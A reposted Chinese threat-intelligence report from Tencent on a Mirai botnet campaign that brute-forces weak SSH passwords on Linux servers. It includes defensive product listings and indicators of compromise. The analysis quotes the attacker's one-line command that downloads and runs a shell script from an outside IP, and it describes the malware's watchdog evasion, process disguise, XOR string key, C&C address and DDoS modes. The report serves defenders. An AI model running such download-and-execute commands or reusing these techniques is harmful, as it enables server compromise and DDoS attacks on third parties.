当前位置:首页 > 黑客技术 > 正文内容

Mirai 僵尸 *** 利用弱口令爆破攻击上万台 Linux 服务器

访客56年前 (1970-01-01)黑客技术807

感谢腾讯御见威胁情报中心来稿!

原文链接:https://mp.weixin.qq.com/s/8yTiVyxC6_aapGhrTs1uWw

腾讯安全威胁情报中心检测到Mirai僵尸 *** 大规模攻击Linux服务器。攻击者针对Linux服务器的SSH(22端口)进行弱口令爆破攻击,成功登陆后执行shellcode下载shell脚本,然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸 *** 二进制木马程序。

一、概述

腾讯安全威胁情报中心检测到Mirai僵尸 *** 大规模攻击Linux服务器。攻击者针对Linux服务器的SSH(22端口)进行弱口令爆破攻击,成功登陆后执行shellcode下载shell脚本,然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸 *** 二进制木马程序。

Mirai是一个大型僵尸 *** ,主要通过SSH和telnet弱口令进行感染,攻击目标包括监控摄像头、路由器等物联网设备以及Linux服务器,控制机器后通过C&C服务器下发命令进行DDoS攻击。根据腾讯安全威胁情报中心监测数据,Mirai僵尸 *** 已在全国造成上万台设备感染,其中感染最多的为广东、上海和北京。

腾讯安全专家建议企业linux管理员避免使用弱口令,关闭非必须启用的端口,以防御黑客利用弱口令爆破的方式远程入侵,腾讯安全系列产品也针对Mirai僵尸 *** 的技术特点进行响应,清单如下:

应用

场景

安全产品 解决方案

腾讯T-Sec

威胁情报云查服务

(SaaS)

1)Mirai僵尸 *** 相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1)Mirai僵尸 *** 相关信息和情报已支持检索。

网管可通过威胁追溯系统,分析日志,进行线索研判、追溯 *** 入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts

云原生安全

防护

云防火墙

(Cloud Firewall,CFW)

基于 *** 流量进行威胁检测与主动拦截,已支持:

1)Mirai僵尸 *** 关联的IOCs已支持识别检测;

2)告警弱口令爆破行为。

有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw

腾讯T-Sec  主机安全

(Cloud Workload Protection,CWP)

1)已支持查杀Mirai僵尸 *** 相关木马程序;

2)告警弱口令爆破行为。

腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp

腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html

非云企业安全防护 腾讯T-Sec

高级威胁检测系统

(腾讯御界)

1)已支持通过协议检测Mirai僵尸 *** 木马与服务器的 *** 通信。

关于T-Sec高级威胁检测系统的更多信息,可参考:

https://cloud.tencent.com/product/nta

更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/

二、详细分析

攻击者通过SSH(22端口)弱口令爆破进行远程攻击,攻击成功后执行如下shellcode:

cd /tmp || cd /run || cd /; wget http[:]//193.228.91.123/reportandyougaybins.sh; chmod 777 reportandyougaybins.sh; sh reportandyougaybins.sh

shellcode使用wget下载shell脚本reportandyougaybins.sh到/tmp目录下并通过sh执行,reportandyougaybins.sh脚本内容如下:

reportandyougaybins.sh主要功能为下载和执行二进制木马程序,会分别从以下地址下载基于多个架构体系的样本,其中i586、i686、x86可感染基于Intel处理器的Linux服务器:

http[:]//193.228.91.123/mips

http[:]//193.228.91.123/mipsel

http[:]//193.228.91.123/sh4

http[:]//193.228.91.123/x86

http[:]//193.228.91.123/armv6l

http[:]//193.228.91.123/i686

http[:]//193.228.91.123/powerpc

http[:]//193.228.91.123/i586

http[:]//193.228.91.123/m68k

http[:]//193.228.91.123/sparc

http[:]//193.228.91.123/armv4l

http[:]//193.228.91.123/armv5l

以i586为例进行分析,该样本的主要功能为与C&C地址通信,接收远程命令对目标发起DDOS攻击。在IOT设备中,通常会有看门狗(watchdog)进程,不断给看门狗进程发送发送心跳可以保持设备不重启。Mirai首先尝试发送控制码0x80045704来关闭看门狗功能,如果未成功关闭,则进入循环不断向其发送保活指令0x80045705。

将木马进程名替换为”/usr/ *** in/dropbear”或者”sshd”隐藏自身。

从/proc/net/route中获取本机IP。

初始化table,并将后续要使用的数据添加到table中。

然后table_retrieve_val从table中取出数据,table_lock_val和table_unlock_val分别为加密和解密数据,解密函数在toggle_obf()中实现,解密 *** 是将数据与table_key进行循环异或,其中table_key=0xDEDEFFBA。

解密并连接C&C服务器194.180.224.103:3982,然后向其发送字符串解密并连接C&C服务器194.180.224.103:3982,然后向其发送字符串“arch xxx”,xxx为设备平台类型。

Mirai与C&C服务器通信TCP流:

获取C&C服务器返回的数据后,进入processCmd处理接收到的命令。

Mirai可根据命令向目标发起以下类型的DDoS攻击:”HTTP”、”CUDP”、”UDP”、”STD”、”CTCP”、”TCP”、”SYN”、”ACK”、”CXMAS”、”XMAS”、”CVSE”、”VSE”、”CNC”。

HTTP攻击:

UDP攻击:

TCP攻击:

SYN攻击:

ACK攻击:

IOCs

IP

193.228.91.123

194.180.224.103

45.95.168.138

45.95.168.190

37.49.224.87

193.228.91.124

185.172.110.185

C&C

194.180.224.103:3982

MD5

649a06f5159fc4e8ee269a9e0e1fd095

8bb40eb446abb7472cb3a892fd2450b4

3f3f8184219514d5834df94f362c74bc

ef3b89e44a3a4973575a876ee5105cec

34033f561d196495e5c4780327acca0a

6f637a4ccfd00d9c2e08ecb84ce0b987

03ff0f5521631db7fa0d7990b5b4c19e

91c0f5304438a42ae5f28c8c0ff15954

536accde3643cb8294dd671ae5bdb3a2

9789917095d92cfe507e5fc2266667a1

8bafcd3d57dc597af4b6cb497cf0a0de

7e8e28631962dd5d52cbd93e50e7916e

7bfd106fe9d41c658f3be934346d3ff6

f0d5b7e31b4308c5ec326de9304bd3f4

bd1db394d52b950eed972eae93b80469

8b49a58a0bcb93afe72f1e3c1d800515

97a3699b819496892788b5c7a24be868

990fe40e991b9813a4f73b115ba160cb

2c0cc3d82871cfc05d38ea0a04f7f80a

26c56b011a494886e758d12fc07f6951

6e6d56669554c492ec4b1a9abd23e35b

64e5195e9cde652de6b2623d2d3e098d

1eeee50672a42dc2e55c6d4126afaf26

f6bbcf50aeda03aab1b5bc21b3df3e99

8e7d3e4bedf9bc3ed8a67890edc36590

556bd1d4d93abf19b4075d12ffef02a8

0d5302aa5491b3944566a212ca205923

ef72d6cc859438142a166f1d3ea4d462

193f92152f483aeb7ebe6d42855d9f27

1de00b44ef800a9d878de591fc43b854

b6e5bfb4b2f75d828022b84a247e99f2

039f379f3a36b4ab982a5ada7ceea078

51547b23165bc6f205ec3625840f3800

92137cf8ff782e15995919ebaa658474

94e027f4d33900f116bcf176aba726de

aefe0411bd89a9b97c1741b75c9f7d71

d15256b7a475f8934daf79364b0885a1

c624ed18ad756aa6f41a70fe90102d78

5ff2fc4de3a059b504e09b7b1663ac1f

fe6d19da030b1d299c35e89639d567bd

24a2659c72a980997161950926063b84

51b2190aa408ae08c6c9bf8dc8acc6e0

ecd696438914cc3c60dbf6de0df48f87

b45af2197eb3d12a199a40a048a36db6

32ef86b0358793f7ceffe1822bbf70e1

60fd7ed2e1ad0d41875d761b899766c4

0970f7f309bc678b0117d600e3f80f5f

a1dc1c62dba56af6a8b25767074d691d

1cca73d23c7e50f4111815e840bd8960

42c87649e776dd73aa06033f9b8b750e

08dc3f3c77161e1cc349d91263f76b8c

61915eb8d8742fea42d3683c7255945a

000466d4c6c06398042851a7c049f6b6

0be41e0b52c51ab4ad966513455550b1

6290db15f07f6ebb114824b912a10129

fe19b99077ef4fe492107e4a9b943094

9068c1c69ab5c6ba80f01bab1a1a2ad4

8bb40eb446abb7472cb3a892fd2450b4

2b8796693b5f578c40611e5221fb4788

9f71d8839d89f7bed716bb3f509eb22f

47f12cf0806d2875c592a7d15e266ee6

8ee73860cfe02ca529671c060c18cf00

9e91347c4d8afad598d21e446f967fb2

71d2dc0728e710e4f939c97e88929930

672380fd4c58302e1c48a45e75c580d7

143f7de27921db16b08cea70bb3bef7b

63db9805775b20dae4c0f06e03585446

4a751ef5ef5e48cfef33bd29e2a4a5b7

00bf4ee5a64971260683e047719c0dd8

028b7629ff410f429ba65db1f6779226

URL

http[:]//193.228.91.123/ares.sh

http[:]//193.228.91.123/arm7

http[:]//193.228.91.123/armv6l

http[:]//193.228.91.123/i686

http[:]//193.228.91.123/33bi/Ares.ppc

http[:]//193.228.91.123/33bi/Ares.arm6

http[:]//193.228.91.123/33bi/ares.armebv7

http[:]//193.228.91.123/33bi/ares.mips

http[:]//193.228.91.123/33bi/Ares.m68k

http[:]//193.228.91.123/33bi/ares.mpsl

http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.ppc

http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.m68k

http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.spc

http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.i686

http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.sh4

http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.arc

http[:]//193.228.91.123/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh

http[:]//193.228.91.123/reportandyougaybins.sh

http[:]//193.228.91.123/mips

http[:]//193.228.91.123/mipsel

http[:]//193.228.91.123/sh4

http[:]//193.228.91.123/x86

http[:]//193.228.91.123/armv6l

http[:]//193.228.91.123/i686

http[:]//193.228.91.123/powerp

http[:]//193.228.91.123/i586

http[:]//193.228.91.123/m68k

http[:]//193.228.91.123/sparc

http[:]//193.228.91.123/armv4l

http[:]//193.228.91.123/armv5l

http[:]//194.180.224.103/mips

http[:]//194.180.224.103/mipsel

http[:]//194.180.224.103/sh4

http[:]//194.180.224.103/x86

http[:]//194.180.224.103/armv6l

http[:]//194.180.224.103/i686

http[:]//194.180.224.103/powerpc

http[:]//194.180.224.103/i586

http[:]//194.180.224.103/m68k

http[:]//194.180.224.103/sparc

http[:]//194.180.224.103/armv4l

http[:]//194.180.224.103/armv5l

参考链接:

https://www.freebuf.com/articles/terminal/117927.html

http://blog.nsfocus.net/mirai-source- *** ysis-report/

扫描二维码推送至手机访问。

版权声明:本文由黑客技术发布,如需转载请注明出处。

本文链接:https://w-123.com/32822.html

“Mirai 僵尸 *** 利用弱口令爆破攻击上万台 Linux 服务器” 的相关文章

基于800个恶意 NPM 包的大规模供应链攻击

Hackernews 编译,转载请注明出处: 一个名为“RED-LILI”的攻击者发布了近800个恶意模块,与正在进行的针对 NPM 软件包库的大规模供应链攻击活动联系紧密。 以色列安全公司 Checkmarx 说: “通常,攻击者使用一个匿名的一次性 NPM 帐户发动攻击。”“这一次,攻击...

加密货币使勒索软件的使用变得更加普遍

眼下,勒索软件已经成为互联网上的一种趋势,它的目标包括企业、政府机构、医院和学校。这是一个几十年前就存在的问题,但在过去几年中变得非常普遍。最初,黑客以个人为目标,要求提供几百美元的比特币,但现在他们追求更大的目标,他们可以勒索更大的金额,并且被勒索放在没有电脑和服务器的情况下无法继续正常使用 密...

ESET:黑客借中东新闻网站对目标访客发起攻击

经历了持续一年多的追踪,网络安全研究人员终于摸清了“中东之眼”新闻网站入侵事件的来龙去脉。由 ESET 周二发布的报告可知,一群黑客入侵了总部位于伦敦的这家热门新闻网站。这家网站着眼于中东地区的新闻报道,而攻击者的最终目标却是网站访客。 伊朗驻阿布扎比大使馆网站的脚本注入 据悉,这轮黑客活动一直从...

微软警告 NOBELIUM 攻击技术愈加泛滥 谨防 HTML 代码夹带恶意软件

早在 5 月,微软就认定有俄罗斯背景的 NOBELIUM 黑客组织要对持续数月的 SolarWinds 网络攻击事件负责,并同企业、政府和执法机构达成了合作,以遏制此类网络攻击的负面影响。早些时候,微软更进一步地剖析了 NOBELIUM 使用的一套更加复杂的恶意软件传送方法。可知其用于造成破坏,并获...

每周针对教育机构的网络攻击数量显增著加

援引以色列时报报道,网络安全公司 Check Point 发现了令人不安的统计数据:每周针对教育机构的网络攻击数量显著增加。学校、学院和研究机构是目标组织之一。2021 年 7 月,每个机构平均每周发生 1739 次攻击,比去年同月增长 29%。 受该问题影响最大的 3 个国家包括: ● 印度 –...

拜登与普京通电话 呼吁对勒索软件攻击采取行动

白宫发布声明称,美国总统乔·拜登周五与俄罗斯总统弗拉基米尔·普京通电话,敦促普京采取行动打击该国的黑客。美国认为,世界各地公司最近遭到的勒索攻击是俄罗斯黑客所为。声明说,“拜登强调俄罗斯需要采取行动打击在俄罗斯运作的勒索软件组织,并强调他致力于继续应对勒索软件构成的更广泛威胁。” 声明称,拜登...

评论列表

竹祭折奉
2年前 (2022-07-08)

[:]//194.180.224.103/armv4lhttp[:]//194.180.224.103/armv5l参考链接:https://www.freebuf.com/articles/terminal/117927.htmlhttp://blog.nsfocus.net

澄萌妏与
2年前 (2022-07-08)

f80f5fa1dc1c62dba56af6a8b25767074d691d1cca73d23c7e50f4111815e840bd896042c87649e776dd73aa06033f9b8b75

弦久艳鬼
2年前 (2022-07-08)

tencent.com/product/cfw腾讯T-Sec  主机安全(Cloud Workload Protection,CWP)1)已支持查杀Mirai僵尸网络相关木马程序;2)告警弱口令爆破行为。腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关

莣萳羞稚
2年前 (2022-07-08)

防护云防火墙(Cloud Firewall,CFW)基于网络流量进行威胁检测与主动拦截,已支持:1)Mirai僵尸网络关联的IOCs已支持识别检测;2)告警弱口令爆破行为。有关云防火墙的更多信

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。